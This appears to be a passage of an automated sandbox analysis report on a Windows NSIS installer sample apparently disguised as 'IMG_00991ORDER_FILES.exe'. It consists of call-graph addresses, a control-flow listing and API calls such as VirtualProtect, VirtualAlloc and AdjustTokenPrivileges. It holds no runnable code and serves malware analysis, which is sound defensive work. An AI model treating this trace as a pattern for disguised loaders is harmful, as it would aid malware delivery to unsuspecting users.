calls 2783->2784 2786 403d6d 2784->2786 2787 403d05 2785->2787 2788 403d7d LoadImageW 2786->2788 2791 406591 21 API calls 2786->2791 2787->2783 2794 403d26 lstrlenW 2787->2794 2798 405e50 CharNextW 2787->2798 2789 403e23 2788->2789 2790 403da4 RegisterClassW 2788->2790 2793 40140b 2 API calls 2789->2793 2792 403dda SystemParametersInfoW CreateWindowExW 2790->2792 2823 403e2d 2790->2823 2791->2788 2792->2789 2797 403e29 2793->2797 2795 403d34 lstrcmpiW 2794->2795 2796 403d5a 2794->2796 2795->2796 2800 403d44 GetFileAttributesW 2795->2800 2801 405e23 3 API calls 2796->2801 2803 403efc 22 API calls 2797->2803 2797->2823 2799 403d23 2798->2799 2799->2794 2802 403d50 2800->2802 2804 403d60 2801->2804 2802->2796 2805 405e6f 2 API calls 2802->2805 2806 403e3a 2803->2806 2991 406554 lstrcpynW 2804->2991 2805->2796 2808 403e46 ShowWindow 2806->2808 2809 403ec9 2806->2809 2811 4068d8 3 API calls 2808->2811 2992 4056ac OleInitialize 2809->2992 2813 403e5e 2811->2813 2812 403ecf 2814 403ed3 2812->2814 2815 403eeb 2812->2815 2816 403e6c GetClassInfoW 2813->2816 2820 4068d8 3 API calls 2813->2820 2822 40140b 2 API calls 2814->2822 2814->2823 2819 40140b 2 API calls 2815->2819 2817 403e80 GetClassInfoW RegisterClassW 2816->2817 2818 403e96 DialogBoxParamW 2816->2818 2817->2818 2821 40140b 2 API calls 2818->2821 2819->2823 2820->2816 2821->2823 2822->2823 2823->2720 2825 406948 5 API calls 2824->2825 2826 40394c lstrlenW 2825->2826 2827 406554 lstrcpynW 2826->2827 2827->2701 2829 405af4 2828->2829 2830 405af8 GetLastError 2828->2830 2829->2714 2830->2829 2832 403a29 CopyFileW 2831->2832 2833 406328 2831->2833 2832->2704 2832->2720 3000 40619a 2833->3000 2836 405b76 2835->2836 2837 405b6a CloseHandle 2835->2837 2836->2704 2837->2836 2838->2661 3034 406554 lstrcpynW 2839->3034 2841 405f3c 3035 405ece CharNextW CharNextW 2841->3035 2844 403910 2844->2720 2853 406554 lstrcpynW 2844->2853 2845 406802 5 API calls 2851 405f52 2845->2851 2846 405f83 lstrlenW 2847 405f8e 2846->2847 2846->2851 2849 405e23 3 API calls 2847->2849 2848 4068b1 2 API calls 2848->2851 2850 405f93 GetFileAttributesW 2849->2850 2850->2844 2851->2844 2851->2846 2851->2848 2852 405e6f 2 API calls 2851->2852 2852->2846 2853->2706 2854->2710 2855->2704 2857 405b12 2856->2857 2858 405b16 GetLastError 2856->2858 2857->2714 2858->2857 2860 405f2b 18 API calls 2859->2860 2861 405c80 2860->2861 2862 405c88 DeleteFileW 2861->2862 2864 405c9f 2861->2864 2869 405dd6 2862->2869 2865 405dca 2864->2865 3041 406554 lstrcpynW 2864->3041 2865->2869 2872 4068b1 2 API calls 2865->2872 2866 405cc5 2867 405cd8 2866->2867 2868 405ccb lstrcatW 2866->2868 2871 405e6f 2 API calls 2867->2871 2870 405cde 2868->2870 2869->2718 2873 405cee lstrcatW 2870->2873 2875 405cf9 lstrlenW FindFirstFileW 2870->2875 2871->2870 2874 405de4 2872->2874 2873->2875 2874->2869 2876 405de8 2874->2876 2877 405dbf 2875->2877 2896 405d1b 2875->2896 2878 405e23 3 API calls 2876->2878 2877->2865 2879 405dee 2878->2879 2881 405c18 5 API calls 2879->2881 2880 405da2 FindNextFileW 2883 405db8 FindClose 2880->2883 2880->2896 2884 405dfa 2881->2884 2883->2877 2885 405e14 2884->2885 2886 405dfe 2884->2886 2888 4055d9 28 API calls 2885->2888 2886->2869 2889 4055d9 28 API calls 2886->2889 2888->2869 2891 405e0b 2889->2891 2890 405c60 64 API calls 2890->2896 2893 406314 40 API calls 2891->2893 2892 4055d9 28 API calls 2892->2880 2894 405e12 2893->2894 2894->2869 2895 4055d9 28 API calls 2895->2896 2896->2880 2896->2890 2896->2892 2896->2895 2897 406314 40 API calls 2896->2897 3042 406554 lstrcpynW 2896->3042 3043 405c18 2896->3043 2897->2896 2899 4068d2 2898->2899 2900 4068c7 FindClose 2898->2900 2899->2704 2900->2899 2902 403b64 2901->2902 2903 403b56 CloseHandle 2901->2903 3054 403b91 2902->3054 2903->2902 2906 405c60 71 API calls 2907 403a7f OleUninitialize 2906->2907 2907->2681 2907->2682 2909 405bc9 2908->2909 2910 403a9a ExitProcess 2909->2910 2911 405bdd MessageBoxIndirectW 2909->2911 2911->2910 2913 40351c 2912->2913 2914 405e3f lstrcatW 2912->2914 2913->2736 2914->2913 2916 406080 GetTickCount GetTempFileNameW 2915->2916 2917 4060b6 2916->2917 2918 40352d 2916->2918 2917->2916 2917->2918 2918->2663 2919->2742 2920->2744 2922 405e7d 2921->2922 2923 405e83 CharPrevW 2922->2923 2924 40310e 2922->2924 2923->2922 2923->2924 2925 406554 lstrcpynW 2924->2925 2925->2748 2927 403047 2926->2927 2928 40305f 2926->2928 2929 403050 DestroyWindow 2927->2929 2930 403057 2927->2930 2931 403067 2928->2931 2932 40306f GetTickCount 2928->2932 2929->2930 2930->2752 2962 406984 2931->2962 2934 4030a0 2932->2934 2935 40307d CreateDialogParamW ShowWindow 2932->2935 2934->2752 2935->2934 2937->2760 2940 4032f2 2938->2940 2939 403320 2941 4034d1 ReadFile 2939->2941 2940->2939 2979 4034e7 SetFilePointer 2940->2979 2943 40332b 2941->2943 2944 40346a 2943->2944 2945 40333d GetTickCount 2943->2945 2947 403454 2943->2947 2946 4034ac 2944->2946 2951 40346e 2944->2951 2945->2947 2954 403369 2945->2954 2948 4034d1 ReadFile 2946->2948 2947->2766 2948->2947 2949 4034d1 ReadFile 2949->2954 2950 4034d1 ReadFile 2950->2951 2951->2947 2951->2950 2952 4060f6 WriteFile 2951->2952 2952->2951 2953 4033bf GetTickCount 2953->2954 2954->2947 2954->2949 2954->2953 2955 4033e4 MulDiv wsprintfW 2954->2955 2977 4060f6 WriteFile 2954->2977 2966 4055d9 2955->2966 2980 4060c7 ReadFile 2958->2980 2961->2759 2963 4069a1 PeekMessageW 2962->2963 2964 40306d 2963->2964 2965 406997 DispatchMessageW 2963->2965 2964->2752 2965->2963 2968 4055f4 2966->2968 2976 405696 2966->2976 2967 405610 lstrlenW 2969 405639 2967->2969 2970 40561e lstrlenW 2967->2970 2968->2967 2971 406591 21 API calls 2968->2971 2973 40564c 2969->2973 2974 40563f SetWindowTextW 2969->2974 2972 405630 lstrcatW 2970->2972 2970->2976 2971->2967 2972->2969 2975 405652 SendMessageW SendMessageW SendMessageW 2973->2975 2973->2976 2974->2973 2975->2976 2976->2954 2978 406114 2977->2978 2978->2954 2979->2939 2981 4034e4 2980->2981 2981->2749 2983 403f10 2982->2983 2999 40649b wsprintfW 2983->2999 2985 403f81 2986 403fb5 22 API calls 2985->2986 2988 403f86 2986->2988 2987 403cb1 2987->2781 2988->2987 2989 406591 21 API calls 2988->2989 2989->2988 2990->2778 2991->2783 2993 40451f SendMessageW 2992->2993 2994 4056cf 2993->2994 2997 401389 2 API calls 2994->2997 2998 4056f6 2994->2998 2995 40451f SendMessageW 2996 405708 OleUninitialize 2995->2996 2996->2812 2997->2994 2998->2995 2999->2985 3001 4061f0 GetShortPathNameW 3000->3001 3002 4061ca 3000->3002 3004 406205 3001->3004 3005 40630f 3001->3005 3027 406044 GetFileAttributesW CreateFileW 3002->3027 3004->3005 3007 40620d wsprintfA 3004->3007 3005->2832 3006 4061d4 CloseHandle GetShortPathNameW 3006->3005 3008 4061e8 3006->3008 3009 406591 21 API calls 3007->3009 3008->3001 3008->3005 3010 406235 3009->3010 3028 406044 GetFileAttributesW CreateFileW 3010->3028 3012 406242 3012->3005 3013 406251 GetFileSize GlobalAlloc 3012->3013 3014 406273 3013->3014 3015 406308 CloseHandle 3013->3015 3016 4060c7 ReadFile 3014->3016 3015->3005 3017 40627b 3016->3017 3017->3015 3029 405fa9 lstrlenA 3017->3029 3020 406292 lstrcpyA 3023 4062b4 3020->3023 3021 4062a6 3022 405fa9 4 API calls 3021->3022 3022->3023 3024 4062eb SetFilePointer 3023->3024 3025 4060f6 WriteFile 3024->3025 3026 406301 GlobalFree 3025->3026 3026->3015 3027->3006 3028->3012 3030 405fea lstrlenA 3029->3030 3031 405ff2 3030->3031 3032 405fc3 lstrcmpiA 3030->3032 3031->3020 3031->3021 3032->3031 3033 405fe1 CharNextA 3032->3033 3033->3030 3034->2841 3036 405eeb 3035->3036 3039 405efd 3035->3039 3038 405ef8 CharNextW 3036->3038 3036->3039 3037 405f21 3037->2844 3037->2845 3038->3037 3039->3037 3040 405e50 CharNextW 3039->3040 3040->3039 3041->2866 3042->2896 3051 40601f GetFileAttributesW 3043->3051 3046 405c33 RemoveDirectoryW 3049 405c41 3046->3049 3047 405c3b DeleteFileW 3047->3049 3048 405c45 3048->2896 3049->3048 3050 405c51 SetFileAttributesW 3049->3050 3050->3048 3052 406031 SetFileAttributesW 3051->3052 3053 405c24 3051->3053 3052->3053 3053->3046 3053->3047 3053->3048 3055 403b9f 3054->3055 3056 403ba4 FreeLibrary GlobalFree 3055->3056 3057 403b69 3055->3057 3056->3056 3056->3057 3057->2906 2269 6f8a1058 2271 6f8a1074 2269->2271 2270 6f8a10dd 2271->2270 2272 6f8a1092 2271->2272 2283 6f8a15b6 2271->2283 2274 6f8a15b6 GlobalFree 2272->2274 2275 6f8a10a2 2274->2275 2276 6f8a10a9 GlobalSize 2275->2276 2277 6f8a10b2 2275->2277 2276->2277 2278 6f8a10c8 2277->2278 2279 6f8a10b6 GlobalAlloc 2277->2279 2282 6f8a10d2 GlobalFree 2278->2282 2287 6f8a15dd wsprintfW 2279->2287 2282->2270 2285 6f8a15bc 2283->2285 2284 6f8a15c2 2284->2272 2285->2284 2286 6f8a15ce GlobalFree 2285->2286 2286->2272 2290 6f8a1312 2287->2290 2291 6f8a131b GlobalAlloc lstrcpynW 2290->2291 2292 6f8a10c7 2290->2292 2291->2292 2292->2278 3062 6f8a1979 3063 6f8a199c 3062->3063 3064 6f8a19e3 3063->3064 3065 6f8a19d1 GlobalFree 3063->3065 3066 6f8a1312 2 API calls 3064->3066 3065->3064 3067 6f8a1b6e GlobalFree GlobalFree 3066->3067 2293 403fd4 2294 403fec 2293->2294 2295 40414d 2293->2295 2294->2295 2296 403ff8 2294->2296 2297 40419e 2295->2297 2298 40415e GetDlgItem GetDlgItem 2295->2298 2300 404003 SetWindowPos 2296->2300 2301 404016 2296->2301 2299 4041f8 2297->2299 2307 401389 2 API calls 2297->2307 2302 4044d3 22 API calls 2298->2302 2308 404148 2299->2308 2366 40451f 2299->2366 2300->2301 2304 404061 2301->2304 2305 40401f ShowWindow 2301->2305 2306 404188 SetClassLongW 2302->2306 2311 404080 2304->2311 2312 404069 DestroyWindow 2304->2312 2309 40413a 2305->2309 2310 40403f GetWindowLongW 2305->2310 2313 40140b 2 API calls 2306->2313 2316 4041d0 2307->2316 2405 40453a 2309->2405 2310->2309 2318 404058 ShowWindow 2310->2318 2314 404085 SetWindowLongW 2311->2314 2315 404096 2311->2315 2319 40445c 2312->2319 2313->2297 2314->2308 2315->2309 2320 4040a2 GetDlgItem 2315->2320 2316->2299 2321 4041d4 SendMessageW 2316->2321 2318->2304 2319->2308 2326 40448d ShowWindow 2319->2326 2324 4040d0 2320->2324 2325 4040b3 SendMessageW IsWindowEnabled 2320->2325 2321->2308 2322 40140b 2 API calls 2333 40420a 2322->2333 2323 40445e DestroyWindow EndDialog 2323->2319 2328 4040dd 2324->2328 2330 404124 SendMessageW 2324->2330 2331 4040f0 2324->2331 2340 4040d5 2324->2340 2325->2308 2325->2324 2326->2308 2328->2330 2328->2340 2330->2309 2334 4040f8 2331->2334 2335 40410d 2331->2335 2332 40410b 2332->2309 2333->2308 2333->2322 2333->2323 2336 4044d3 22 API calls 2333->2336 2357 40439e DestroyWindow 2333->2357 2369 406591 2333->2369 2386 4044d3 2333->2386 2399 40140b 2334->2399 2337 40140b 2 API calls 2335->2337 2336->2333 2339 404114 2337->2339 2339->2309 2339->2340 2402 4044ac 2340->2402 2342 404285 GetDlgItem 2343 4042a2 ShowWindow KiUserCallbackDispatcher 2342->2343 2344 40429a 2342->2344 2389 4044f5 KiUserCallbackDispatcher 2343->2389 2344->2343 2346 4042cc EnableWindow 2351 4042e0 2346->2351 2347 4042e5 GetSystemMenu EnableMenuItem SendMessageW 2348 404315 SendMessageW 2347->2348 2347->2351 2348->2351 2351->2347 2390 404508 SendMessageW 2351->2390 2391 403fb5 2351->2391 2394 406554 lstrcpynW 2351->2394 2353 404344 lstrlenW 2354 406591 21 API calls 2353->2354 2355 40435a SetWindowTextW 2354->2355 2395 401389 2355->2395 2357->2319 2358 4043b8 CreateDialogParamW 2357->2358 2358->2319 2359 4043eb 2358->2359 2360 4044d3 22 API calls 2359->2360 2361 4043f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2360->2361 2362 401389 2 API calls 2361->2362 2363 40443c 2362->2363 2363->2308 2364 404444 ShowWindow 2363->2364 2365 40451f SendMessageW 2364->2365 2365->2319 2367 404537 2366->2367 2368 404528 SendMessageW 2366->2368 2367->2333 2368->2367 2373 40659c 2369->2373 2370 4067e3 2371 4067fc 2370->2371 2441 406554 lstrcpynW 2370->2441 2371->2333 2373->2370 2374 4067b4 lstrlenW 2373->2374 2375 4066ad GetSystemDirectoryW 2373->2375 2376 406591 15 API calls 2373->2376 2380 4066c3 GetWindowsDirectoryW 2373->2380 2381 406591 15 API calls 2373->2381 2382 406755 lstrcatW 2373->2382 2385 406725 SHGetPathFromIDListW CoTaskMemFree 2373->2385 2419 406422 2373->2419 2424 406948 GetModuleHandleA 2373->2424 2430 406802 2373->2430 2439 40649b wsprintfW 2373->2439 2440 406554 lstrcpynW 2373->2440 2374->2373 2375->2373 2376->2374 2380->2373 2381->2373 2382->2373 2385->2373 2387 406591 21 API calls 2386->2387 2388 4044de SetDlgItemTextW 2387->2388 2388->2342 2389->2346 2390->2351 2392 406591 21 API calls 2391->2392 2393 403fc3 SetWindowTextW 2392->2393 2393->2351 2394->2353 2397 401390 2395->2397 2396 4013fe 2396->2333 2397->2396 2398 4013cb MulDiv SendMessageW 2397->2398 2398->2397 2400 401389 2 API calls 2399->2400 2401 401420 2400->2401 2401->2340 2403 4044b3 2402->2403 2404 4044b9 SendMessageW 2402->2404 2403->2404 2404->2332 2406 4045fd 2405->2406 2407 404552 GetWindowLongW 2405->2407 2406->2308 2407->2406 2408 404567 2407->2408 2408->2406 2409 404594 GetSysColor 2408->2409 2410 404597 2408->2410 2409->2410 2411 4045a7 SetBkMode 2410->2411 2412 40459d SetTextColor 2410->2412 2413 4045c5 2411->2413 2414 4045bf GetSysColor 2411->2414 2412->2411 2415 4045d6 2413->2415 2416 4045cc SetBkColor 2413->2416 2414->2413 2415->2406 2417 4045f0 CreateBrushIndirect 2415->2417 2418 4045e9 DeleteObject 2415->2418 2416->2415 2417->2406 2418->2417 2442 4063c1 2419->2442 2422 406486 2422->2373 2423 406456 RegQueryValueExW RegCloseKey 2423->2422 2425 406964 2424->2425 2426 40696e GetProcAddress 2424->2426 2446 4068d8 GetSystemDirectoryW 2425->2446 2428 40697d 2426->2428 2428->2373 2429 40696a 2429->2426 2429->2428 2431 40680f 2430->2431 2433 406878 CharNextW 2431->2433 2435 406885 2431->2435 2437 406864 CharNextW 2431->2437 2438 406873 CharNextW 2431->2438 2449 405e50 2431->2449 2432 40688a CharPrevW 2432->2435 2433->2431 2433->2435 2435->2432 2436 4068ab 2435->2436 2436->2373 2437->2431 2438->2433 2439->2373 2440->2373 2441->2371 2443 4063d0 2442->2443 2444 4063d4 2443->2444 2445 4063d9 RegOpenKeyExW 2443->2445 2444->2422 2444->2423 2445->2444 2447 4068fa wsprintfW LoadLibraryExW 2446->2447 2447->2429 2450 405e56 2449->2450 2451 405e6c 2450->2451 2452 405e5d CharNextW 2450->2452 2451->2431 2452->2450 2453 6f8a2a7f 2454 6f8a2acf 2453->2454 2455 6f8a2a8f VirtualProtect 2453->2455 2455->2454 3074 6f8a103d 3077 6f8a101b 3074->3077 3078 6f8a15b6 GlobalFree 3077->3078 3079 6f8a1020 3078->3079 3080 6f8a1027 GlobalAlloc 3079->3080 3081 6f8a1024 3079->3081 3080->3081 3082 6f8a15dd 3 API calls 3081->3082 3083 6f8a103b 3082->3083 3084 402fb8 3085 402fe3 3084->3085 3086 402fca SetTimer 3084->3086 3087 403038 3085->3087 3088 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3085->3088 3086->3085 3088->3087 2456 6f8a1817 2457 6f8a184a 2456->2457 2498 6f8a1bff 2457->2498 2459 6f8a1851 2460 6f8a1976 2459->2460 2461 6f8a1869 2459->2461 2462 6f8a1862 2459->2462 2532 6f8a2480 2461->2532 2548 6f8a243e 2462->2548 2467 6f8a18af 2561 6f8a2655 2467->2561 2468 6f8a18cd 2473 6f8a191e 2468->2473 2474 6f8a18d3 2468->2474 2469 6f8a1898 2485 6f8a188e 2469->2485 2558 6f8a2e23 2469->2558 2470 6f8a187f 2472 6f8a1885 2470->2472 2478 6f8a1890 2470->2478 2472->2485 2542 6f8a2b98 2472->2542 2476 6f8a2655 10 API calls 2473->2476 2577 6f8a1666 2474->2577 2486 6f8a190f 2476->2486 2477 6f8a18b5 2572 6f8a1654 2477->2572 2552 6f8a2810 2478->2552 2484 6f8a2655 10 API calls 2484->2486 2485->2467 2485->2468 2489 6f8a1965 2486->2489 2583 6f8a2618 2486->2583 2488 6f8a1896 2488->2485 2489->2460 2491 6f8a196f GlobalFree 2489->2491 2490 6f8a1312 2 API calls 2493 6f8a18c1 GlobalFree 2490->2493 2491->2460 2493->2486 2495 6f8a1951 2495->2489 2497 6f8a15dd 3 API calls 2495->2497 2496 6f8a194a FreeLibrary 2496->2495 2497->2489 2587 6f8a12bb GlobalAlloc 2498->2587 2500 6f8a1c26 2588 6f8a12bb GlobalAlloc 2500->2588 2502 6f8a1e6b GlobalFree GlobalFree GlobalFree 2504 6f8a1e88 2502->2504 2517 6f8a1ed2 2502->2517 2503 6f8a1c31 2503->2502 2506 6f8a1d26 GlobalAlloc 2503->2506 2508 6f8a1d71 lstrcpyW 2503->2508 2509 6f8a1d8f GlobalFree 2503->2509 2513 6f8a1d7b lstrcpyW 2503->2513 2516 6f8a2126 2503->2516 2503->2517 2523 6f8a2067 GlobalFree 2503->2523 2524 6f8a21ae 2503->2524 2526 6f8a12cc 2 API calls 2503->2526 2527 6f8a1dcd 2503->2527 2505 6f8a227e 2504->2505 2514 6f8a1e9d 2504->2514 2504->2517 2507 6f8a22a0 GetModuleHandleW 2505->2507 2505->2517 2506->2503 2510 6f8a22b1 LoadLibraryW 2507->2510 2511 6f8a22c6 2507->2511 2508->2513 2509->2503 2510->2511 2510->2517 2595 6f8a16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2511->2595 2513->2503 2514->2517 2591 6f8a12cc 2514->2591 2515 6f8a2318 2515->2517 2518 6f8a2325 lstrlenW 2515->2518 2594 6f8a12bb GlobalAlloc 2516->2594 2517->2459 2596 6f8a16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2518->2596 2521 6f8a22d8 2521->2515 2530 6f8a2302 GetProcAddress 2521->2530 2523->2503 2524->2517 2528 6f8a2216 lstrcpyW 2524->2528 2525 6f8a233f 2525->2517 2526->2503 2527->2503 2589 6f8a162f GlobalSize GlobalAlloc 2527->2589 2528->2517 2530->2515 2531 6f8a212f 2531->2459 2539 6f8a2498 2532->2539 2533 6f8a12cc GlobalAlloc lstrcpynW 2533->2539 2535 6f8a25c1 GlobalFree 2536 6f8a186f 2535->2536 2535->2539 2536->2469 2536->2470 2536->2485 2537 6f8a256b GlobalAlloc CLSIDFromString 2537->2535 2538 6f8a2540 GlobalAlloc WideCharToMultiByte 2538->2535 2539->2533 2539->2535 2539->2537 2539->2538 2541 6f8a258a 2539->2541 2598 6f8a135a 2539->2598 2541->2535 2602 6f8a27a4 2541->2602 2544 6f8a2baa 2542->2544 2543 6f8a2c4f CreateFileA 2547 6f8a2c6d 2543->2547 2544->2543 2546 6f8a2d39 2546->2485 2605 6f8a2b42 2547->2605 2549 6f8a2453 2548->2549 2550 6f8a245e GlobalAlloc 2549->2550 2551 6f8a1868 2549->2551 2550->2549 2551->2461 2556 6f8a2840 2552->2556 2553 6f8a28db GlobalAlloc 2557 6f8a28fe 2553->2557 2554 6f8a28ee 2555 6f8a28f4 GlobalSize 2554->2555 2554->2557 2555->2557 2556->2553 2556->2554 2557->2488 2559 6f8a2e2e 2558->2559 2560 6f8a2e6e GlobalFree 2559->2560 2609 6f8a12bb GlobalAlloc 2561->2609 2563 6f8a26fa StringFromGUID2 2566 6f8a265f 2563->2566 2564 6f8a270b lstrcpynW 2564->2566 2565 6f8a26d8 MultiByteToWideChar 2565->2566 2566->2563 2566->2564 2566->2565 2567 6f8a271e wsprintfW 2566->2567 2568 6f8a2742 GlobalFree 2566->2568 2569 6f8a2777 GlobalFree 2566->2569 2570 6f8a1312 2 API calls 2566->2570 2610 6f8a1381 2566->2610 2567->2566 2568->2566 2569->2477 2570->2566 2614 6f8a12bb GlobalAlloc 2572->2614 2574 6f8a1659 2575 6f8a1666 2 API calls 2574->2575 2576 6f8a1663 2575->2576 2576->2490 2578 6f8a169f lstrcpyW 2577->2578 2579 6f8a1672 wsprintfW 2577->2579 2582 6f8a16b8 2578->2582 2579->2582 2582->2484 2584 6f8a2626 2583->2584 2585 6f8a1931 2583->2585 2584->2585 2586 6f8a2642 GlobalFree 2584->2586 2585->2495 2585->2496 2586->2584 2587->2500 2588->2503 2590 6f8a164d 2589->2590 2590->2527 2597 6f8a12bb GlobalAlloc 2591->2597 2593 6f8a12db lstrcpynW 2593->2517 2594->2531 2595->2521 2596->2525 2597->2593 2599 6f8a1361 2598->2599 2600 6f8a12cc 2 API calls 2599->2600 2601 6f8a137f 2600->2601 2601->2539 2603 6f8a2808 2602->2603 2604 6f8a27b2 VirtualAlloc 2602->2604 2603->2541 2604->2603 2606 6f8a2b4d 2605->2606 2607 6f8a2b5d 2606->2607 2608 6f8a2b52 GetLastError 2606->2608 2607->2546 2608->2607 2609->2566 2611 6f8a138a 2610->2611 2612 6f8a13ac 2610->2612 2611->2612 2613 6f8a1390 lstrcpyW 2611->2613 2612->2566 2613->2612 2614->2574 2615 6f8a1774 2616 6f8a17a3 2615->2616 2617 6f8a1bff 22 API calls 2616->2617 2618 6f8a17aa 2617->2618 2619 6f8a17bd 2618->2619 2620 6f8a17b1 2618->2620 2621 6f8a17c7 2619->2621 2622 6f8a17e4 2619->2622 2623 6f8a1312 2 API calls 2620->2623 2624 6f8a15dd 3 API calls 2621->2624 2625 6f8a17ea 2622->2625 2626 6f8a180e 2622->2626 2627 6f8a17bb 2623->2627 2628 6f8a17cc 2624->2628 2629 6f8a1654 3 API calls 2625->2629 2630 6f8a15dd 3 API calls 2626->2630 2631 6f8a1654 3 API calls 2628->2631 2632 6f8a17ef 2629->2632 2630->2627 2633 6f8a17d2 2631->2633 2634 6f8a1312 2 API calls 2632->2634 2635 6f8a1312 2 API calls 2633->2635 2636 6f8a17f5 GlobalFree 2634->2636 2637 6f8a17d8 CloseHandle 2635->2637 2636->2627 2638 6f8a1809 GlobalFree 2636->2638 2637->2627 2638->2627

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 40352f-403581 SetErrorMode GetVersionExW 1 403583-4035b3 GetVersionExW 0->1 2 4035bb-4035c0 0->2 1->2 3 4035c2 2->3 4 4035c8-40360a 2->4 3->4 5 40360c-403614 call 406948 4->5 6 40361d 4->6 5->6 11 403616 5->11 8 403622-403636 call 4068d8 lstrlenA 6->8 13 403638-403654 call 406948 * 3 8->13 11->6 20 403665-4036c9 #17 OleInitialize SHGetFileInfoW call 406554 GetCommandLineW call 406554 13->20 21 403656-40365c 13->21 28 4036d2-4036e6 call 405e50 CharNextW 20->28 29 4036cb-4036cd 20->29 21->20 25 40365e 21->25 25->20 32 4037e1-4037e7 28->32 29->28 33 4036eb-4036f1 32->33 34 4037ed 32->34 35 4036f3-4036f8 33->35 36 4036fa-403701 33->36 37 403801-40381b GetTempPathW call 4034fe 34->37 35->35 35->36 38 403703-403708 36->38 39 403709-40370d 36->39 47 403873-40388d DeleteFileW call 4030a2 37->47 48 40381d-40383b GetWindowsDirectoryW lstrcatW call 4034fe 37->48 38->39 41 403713-403719 39->41 42 4037ce-4037dd call 405e50 39->42 45 403733-40376c 41->45 46 40371b-403722 41->46 42->32 59 4037df-4037e0 42->59 53 403789-4037c3 45->53 54 40376e-403773 45->54 51 403724-403727 46->51 52 403729 46->52 64 403893-403899 47->64 65 403a7a-403a8a call 403b4c OleUninitialize 47->65 48->47 62 40383d-40386d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fe 48->62 51->45 51->52 52->45 57 4037c5-4037c9 53->57 58 4037cb-4037cd 53->58 54->53 61 403775-40377d 54->61 57->58 63 4037ef-4037fc call 406554 57->63 58->42 59->32 66 403784 61->66 67 40377f-403782 61->67 62->47 62->65 63->37 70 403932-403939 call 403c26 64->70 71 40389f-4038aa call 405e50 64->71 77 403ab0-403ab6 65->77 78 403a8c-403a9c call 405bb4 ExitProcess 65->78 66->53 67->53 67->66 80 40393e-403942 70->80 82 4038f8-403902 71->82 83 4038ac-4038e1 71->83 84 403b34-403b3c 77->84 85 403ab8-403ace GetCurrentProcess OpenProcessToken 77->85 80->65 86 403904-403912 call 405f2b 82->86 87 403947-40396d call 405b1f lstrlenW call 406554 82->87 91 4038e3-4038e7 83->91 88 403b42-403b46 ExitProcess 84->88 89 403b3e 84->89 92 403ad0-403afe LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403b04-403b12 call 406948 85->93 86->65 105 403918-40392e call 406554 * 2 86->105 110 40397e-403996 87->110 111 40396f-403979 call 406554 87->111 89->88 96 4038f0-4038f4 91->96 97 4038e9-4038ee 91->97 92->93 103 403b20-403b2b ExitWindowsEx 93->103 104 403b14-403b1e 93->104 96->91 102 4038f6 96->102 97->96 97->102 102->82 103->84 108 403b2d-403b2f call 40140b 103->108 104->103 104->108 105->70 108->84 116 40399b-40399f 110->116 111->110 118 4039a4-4039ce wsprintfW call 406591 116->118 122 4039d0 call 405aa8 118->122 123 4039d7 call 405b02 118->123 126 4039d5 122->126 127 4039dc-4039de 123->127 126->127 128 4039e0-4039ea GetFileAttributesW 127->128 129 403a1a-403a39 SetCurrentDirectoryW call 406314 CopyFileW 127->129 131 403a0b-403a16 128->131 132 4039ec-4039f5 DeleteFileW 128->132 137 403a78 129->137 138 403a3b-403a55 call 406314 call 406591 call 405b37 129->138 131->116 134 403a18 131->134 132->131 133 4039f7-403a09 call 405c60 132->133 133->118 133->131 134->65 137->65 145 403a5a-403a5c 138->145 146 403aa2-403aae CloseHandle 145->146 147 403a5e-403a68 145->147 146->137 147->137 148 403a6a-403a72 call 4068b1 147->148 148->118 148->137
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403552
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040357D
                                                                                    • GetVersionExW.KERNEL32(?), ref: 00403590
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403629
                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403666
                                                                                    • OleInitialize.OLE32(00000000), ref: 0040366D
                                                                                    • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
                                                                                    • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004036A1
                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe",00000020,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DA
                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,0000000C,?,00000008,0000000A,0000000C), ref: 00403812
                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 00403823
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040382F
                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 00403843
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040384B
                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040385C
                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403864
                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403878
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe",00000000,0000000A), ref: 00403951
                                                                                      • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                                                                    • wsprintfW.USER32 ref: 004039AE
                                                                                    • GetFileAttributesW.KERNEL32(936,C:\Users\user\AppData\Local\Temp\,936,?), ref: 004039E1
